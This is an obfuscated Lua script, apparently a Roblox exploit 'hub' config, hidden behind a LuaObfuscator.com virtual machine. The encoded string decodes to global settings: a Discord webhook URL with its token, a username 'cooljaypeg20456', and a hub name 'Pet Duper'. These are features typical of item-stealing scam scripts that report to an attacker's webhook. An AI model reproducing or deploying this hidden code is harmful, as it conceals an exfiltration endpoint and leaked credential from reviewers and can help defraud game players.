--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v72=v2(v0(v30,16));if v19 then local v93=0;local v94;while true do if (v93==1) then return v94;end if (v93==0) then v94=v5(v72,v19);v19=nil;v93=1;end end else return v72;end end end);local function v20(v31,v32,v33)if v33 then local v73=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-((558 + 62) -(555 + (91 -27))))) + (932 -(857 + (1139 -(68 + 997)))))) ;return v73-(v73%(569 -(367 + 201))) ;else local v74=(2197 -(226 + 1044)) -(214 + 713) ;local v75;while true do if (v74==(0 + 0)) then v75=2^(v32-(1 + 0)) ;return (((v31%(v75 + v75))>=v75) and (878 -(282 + (2590 -1995)))) or (1637 -(1523 + 114)) ;end end end end local function v21()local v34=117 -(32 + 85) ;local v35;while true do if (v34==(1 + 0)) then return v35;end if (v34==(957 -(892 + 65))) then v35=v1(v16,v18,v18);v18=v18 + ((3 -1) -1) ;v34=1 + 0 ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + (352 -(87 + 263)) );v18=v18 + (182 -(67 + 113)) ;return (v37 * 256) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + 3 );v18=v18 + (9 -5) ;return (v41 * (12302277 + 4474939)) + (v40 * (260471 -194935)) + (v39 * (1208 -((2159 -1357) + 150))) + v38 ;end local function v24()local v42=0 -0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(3 + 0)) then if (v47==((2052 -(87 + 968)) -(315 + 600 + 82))) then if (v46==(0 -0)) then return v48 * (1138 -(116 + 1022)) ;else v47=(17 -13) -3 ;v45=0;end elseif (v47==(1193 + 854)) then return ((v46==(0 -0)) and (v48 * ((1188 -(1069 + 108 + 10))/(859 -(814 + 45))))) or (v48 * NaN) ;end return v8(v48,v47-(2320 -1297) ) * (v45 + (v46/((3 -1)^((27 -17) + 42)))) ;end if (v42==(3 -1)) then v47=v20(v44,21 + 0 ,822 -((1443 -1075) + 423) );v48=((v20(v44,100 -68 )==(1081 -(1020 + 60))) and  -(19 -(10 + 1 + 7))) or ((1119 + 305) -(630 + 793)) ;v42=(24 -13) -8 ;end if (v42==(443 -(416 + 26))) then v45=4 -3 ;v46=(v20(v44,3 -2 ,9 + 11 ) * ((3 -1)^(470 -(145 + 293)))) + v43 ;v42=432 -(44 + 386) ;end if (v42==(766 -(745 + 21))) then v43=v23();v44=v23();v42=1487 -((2411 -(447 + 966)) + 488) ;end end end local function v25(v49)local v50;if  not v49 then v49=v23();if (v49==(0 -0)) then return "";end end v50=v3(v16,v18,(v18 + v49) -(1818 -(1703 + 114)) );v18=v18 + v49 ;local v51={};for v65=702 -(376 + 325) , #v50 do v51[v65]=v2(v1(v3(v50,v65,v65)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0 + 0 ;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (0~=v52) then else v53={};v54={};v55={};v56={v53,v54,nil,v55};v52=1;end if (v52~=(168 -(122 + 44))) then else local v86=0 -0 ;while true do if (v86==0) then for v100=3 -2 ,v23() do local v101=0;local v102;local v103;local v104;while true do if (v101==(1 + 0)) then v104=nil;while true do if (v102~=(0 -0)) then else v103=0 -0 ;v104=nil;v102=1825 -(1195 + 629) ;end if (v102==(1 -0)) then while true do if (v103==(1257 -(1043 + 214))) then v104=v21();if (v20(v104,3 -2 ,1)==(241 -(187 + 54))) then local v131=780 -(162 + 618) ;local v132;local v133;local v134;while true do if (v131~=(0 + 0)) then else local v136=0 + 0 ;while true do if (1~=v136) then else v131=1 -0 ;break;end if ((0 -0)==v136) then local v142=0 + 0 ;while true do if (v142~=(1637 -(1373 + 263))) then else v136=1;break;end if (v142==(1000 -(451 + 549))) then v132=v20(v104,1 + 1 ,4 -1 );v133=v20(v104,6 -2 ,1390 -(746 + 638) );v142=1 + 0 ;end end end end end if (v131~=(3 -2)) then else local v137=0 -0 ;while true do if ((1 + 0)~=v137) then else v131=852 -(20 + 830) ;break;end if (v137==(0 + 0)) then v134={v22(),v22(),nil,nil};if (v132==(0 + 0)) then local v144=0 -0 ;local v145;local v146;while true do if (v144~=(0 + 0)) then else v145=0 + 0 ;v146=nil;v144=1 + 0 ;end if (v144~=(1 + 0)) then else while true do if (0==v145) then v146=0 -0 ;while true do if (v146~=(560 -(306 + 254))) then else v134[3]=v22();v134[1 + 3 ]=v22();break;end end break;end end break;end end elseif (v132==(1552 -(1126 + 425))) then v134[5 -2 ]=v23();elseif (v132==2) then v134[1470 -(899 + 568) ]=v23() -((1123 -(118 + 1003))^(11 + 5)) ;elseif (v132==3) then local v153=0 -0 ;local v154;while true do if (v153==(603 -(268 + 335))) then v154=0;while true do if ((290 -(60 + 230))==v154) then v134[1 + 2 ]=v23() -((574 -(426 + 146))^(29 -13)) ;v134[4 + 0 ]=v22();break;end end break;end end end v137=1 + 0 ;end end end if (v131~=(1459 -(282 + 1174))) then else if (v20(v133,2 + 1 ,2 + 1 )~=(812 -(569 + 242))) then else v134[11 -7 ]=v58[v134[3 + 1 ]];end v53[v100]=v134;break;end if ((1 + 1)==v131) then local v139=1024 -(706 + 318) ;while true do if (v139==(1251 -(721 + 530))) then local v143=1271 -(945 + 326) ;while true do if (v143~=(0 -0)) then else if (v20(v133,1,2 -1 )==1) then v134[1 + 1 ]=v58[v134[4 -2 ]];end if (v20(v133,9 -7 ,2 + 0 )==(701 -(271 + 429))) then v134[3 + 0 ]=v58[v134[1503 -(1408 + 92) ]];end v143=1;end if (v143~=1) then else v139=1087 -(461 + 625) ;break;end end end if (v139~=1) then else v131=2 + 1 ;break;end end end end end break;end end break;end end break;end if (v101==(1288 -(993 + 295))) then v102=0;v103=nil;v101=1 + 0 ;end end end for v105=1172 -(418 + 753) ,v23() do v54[v105-(1 + 0) ]=v28();end v86=732 -(476 + 255) ;end if (v86~=(1 + 0)) then else for v107=1131 -(369 + 761) ,v23() do v55[v107]=v23();end return v56;end end end if (v52~=(1 + 0)) then else local v87=0 + 0 ;while true do if (v87~=0) then else v57=v23();v58={};v87=1;end if (v87==2) then v52=2;break;end if ((530 -(406 + 123))==v87) then for v109=1770 -(1749 + 20) ,v57 do local v110=0 + 0 ;local v111;local v112;local v113;local v114;while true do if (v110==(2 -0)) then while true do if (v111==(1322 -(1249 + 73))) then local v118=0;while true do if (v118~=(1 + 0)) then else v111=1146 -(466 + 679) ;break;end if (v118~=(0 -0)) then else v112=0;v113=nil;v118=2 -1 ;end end end if ((2 -1)~=v111) then else v114=nil;while true do if (v112~=(1900 -(106 + 1794))) then else local v126=216 -(42 + 174) ;while true do if (v126==(0 + 0)) then local v135=0 + 0 ;while true do if (v135==(1 + 0)) then v126=1;break;end if (v135==0) then v113=v21();v114=nil;v135=1 + 0 ;end end end if (v126~=1) then else v112=1;break;end end end if ((1 + 0)==v112) then if (v113==(2 -1)) then v114=v21()~=(0 -0) ;elseif (v113==(1582 -(1183 + 397))) then v114=v24();elseif (v113~=(8 -5)) then else v114=v25();end v58[v109]=v114;break;end end break;end end break;end if (v110~=(1 + 0)) then else v113=nil;v114=nil;v110=2 + 0 ;end if (v110~=(114 -(4 + 110))) then else local v117=0 + 0 ;while true do if (v117~=(585 -(57 + 527))) then else v110=1428 -(41 + 1386) ;break;end if (v117==(1933 -(565 + 1368))) then v111=103 -(17 + 86) ;v112=nil;v117=1 + 0 ;end end end end end v56[3]=v21();v87=3 -1 ;end end end end end local function v29(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v67=1;local v68= -1;local v69={...};local v70=v12("#",...) -1 ;local function v71()local v76=v62;local v77=v63;local v78=v64;local v79=v27;local v80={};local v81={};local v82={};for v88=0 + 0 ,v70 do if ((v88>=v78) or ((2524 -(564 + 292))>=(6864 -2885))) then v80[v88-v78 ]=v69[v88 + (2 -(215 -(22 + 192))) ];else v82[v88]=v69[v88 + ((988 -(483 + 200)) -(244 + 60)) ];end end local v83=(v70-v78) + 1 + 0 ;local v84;local v85;while true do local v89=476 -(41 + 435) ;local v90;while true do if (((1569 -(938 + 63))>(330 + 98)) and (v89==(1125 -(936 + 189)))) then v90=0 + 0 ;while true do if ((1334<=(6226 -(1565 + 48))) and (1==v90)) then if ((v85<=(2 + (1463 -(1404 + 59)))) or ((3003 -(782 + 356))>=(2296 -((481 -305) + 91)))) then if ((4950>=(4209 -2593)) and (v85<=(0 -0))) then do return;end elseif (((2817 -((1310 -335) + 117))==(3600 -(157 + 1718))) and (v85>(1 + 0))) then if (((5179 -3720)<=(8485 -6003)) and (v82[v84[1020 -(697 + 321) ]]==v84[(775 -(468 + 297)) -6 ])) then v67=v67 + ((563 -(334 + 228)) -0) ;else v67=v84[6 -3 ];end else v67=v84[2 + 1 ];end elseif ((v85<=4) or (2696>=(8491 -3959))) then if (((2809 -1761)>=(1279 -(322 + 905))) and (v85==((2070 -1456) -(602 + (20 -11))))) then v82[v84[1191 -(449 + (1342 -602)) ]]=v61[v84[(249 + 626) -(826 + 46) ]];else v82[v84[949 -((481 -(141 + 95)) + 702) ]][v84[9 -6 ]]=v84[2 + 2 ];end elseif (((4856 -(260 + 1638))<(4943 -(382 + 58))) and (v85==(16 -11))) then v82[v84[2 + 0 ]]=v84[5 -2 ];else for v128=v84[5 -3 ],v84[1208 -(902 + 303) ] do v82[v128]=nil;end end v67=v67 + (1 -0) ;break;end if ((v90==0) or ((6587 -(3784 + 68))==(113 + 1196))) then v84=v76[v67];v85=v84[1691 -(1121 + 569) ];v90=1;end end break;end end end end A,B=v27(v11(v71));if  not A[1] then local v91=0;local v92;while true do if (0==v91) then v92=v59[4][v67] or "?" ;error("Script error at ["   .. v92   .. "]:"   .. A[2] );break;end end else return v13(A,2,B);end end;end return v29(v28(),{},v17)(...);end v15("LOL!093O00028O00026O00F03F03023O005F47030A3O00576562682O6F6B55726C03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3130373437353632383633363235343336392F6B58694C6C5973632O736D3662367230617135375549437562766F426E6770414670654D38364153676579492D70677673754E3944626E5F377156526F67786D466A486A03083O00557365726E616D65030F3O00632O6F6C6A6179706567323034353603073O004875624E616D6503093O0050657420447570657200153O0012053O00014O0006000100013O0026023O0002000100010004013O00020001001205000100013O0026020001000A000100020004013O000A0001001203000200033O0030040002000400050004013O0014000100260200010005000100010004013O00050001001203000200033O003004000200060007001203000200033O003004000200080009001205000100023O0004013O000500010004013O001400010004013O000200016O00017O00153O00023O00033O00053O00053O00063O00083O00083O00093O00093O000A3O000C3O000C3O000D3O000D3O000E3O000E3O000F3O00103O00123O00133O00153O00",v9(),...);end
